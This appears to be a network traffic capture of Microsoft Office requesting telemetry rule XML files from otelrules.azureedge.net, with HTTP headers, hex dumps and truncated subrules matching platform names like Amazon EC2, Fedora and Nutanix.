                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                            x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-r1755647c66z67vn9nc21z11a800000004rg00000000d4yn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            46 | 192.168.2.4 | 49799 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                            x-ms-request-id: c417f1b6-b01e-0084-279b-27d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bbnsg5pw6rasm3q8s00000005vg000000003895
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            47 | 192.168.2.4 | 49800 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 192 | OUT | GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                            x-ms-request-id: 174f78f2-a01e-0032-607a-281949000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bbl4n669ut4r27e08000000053000000000431m
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 448 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            48 | 192.168.2.4 | 49801 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 192 | OUT | GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                            x-ms-request-id: b19a9190-b01e-00ab-7309-28dafd000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bb9xxzfyggrfrbqmw00000004k000000000g3fd
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            49 | 192.168.2.4 | 49803 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                            x-ms-request-id: d145a723-401e-0067-13b1-2609c2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003d0000000000g53
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            50 | 192.168.2.4 | 49802 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                            x-ms-request-id: a93e4d9c-801e-0015-6aa4-26f97f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c66qg7mpa8m0fzcvy000000006k0000000009k92
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.4 | 49804 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:27 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                            x-ms-request-id: 64bb7fc7-f01e-0071-5d6f-28431c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbl4n669ut4r27e080000000540000000001t1p
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:27 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.4 | 49805 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                            x-ms-request-id: 0697abc8-001e-00ad-714f-28554b000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c66kcsqh9hy6eyp6kw00000003q0000000003rbx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:27 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.4 | 49806 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:27 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                            x-ms-request-id: ba54a096-301e-0020-3719-266299000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbh7l5skzh3rekksc00000006w0000000000vzb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:27 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.4 | 49807 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                            x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003ag000000005are
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:28 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.4 | 49808 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:27 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                            x-ms-request-id: a8de1b79-001e-0017-5ba3-260c3c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-r1755647c664nptf1txg2psens000000045000000000ench
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:28 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.4 | 49809 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:28 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                            x-ms-request-id: 7fcc546d-701e-001e-80a3-21f5e6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-r1755647c66hbclz9tgqkaxg2w00000006wg00000000dxxx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:28 UTC | 477 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.2.4 | 49810 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:28 UTC | 192 | OUT | GET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:28 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                            x-ms-request-id: ecde688c-a01e-0002-2807-275074000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bb2xwflv0w9dps90c000000068g000000006c7y
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:28 UTC | 419 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.2.4 | 49811 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:28 UTC | 192 | OUT | GET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:28 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:28 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                            x-ms-request-id: 962e216e-b01e-0070-5bcb-261cc0000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181228Z-17fbfdc98bb6vp4m3kc0kte9cs000000068g0000000018f5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:28 UTC | 472 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.4 | 49812 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:29 UTC | 192 | OUT | GET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:29 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                            x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181229Z-r1755647c66hxv26qums8q8fsw00000003fg00000000bt2n
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:29 UTC | 468 | IN
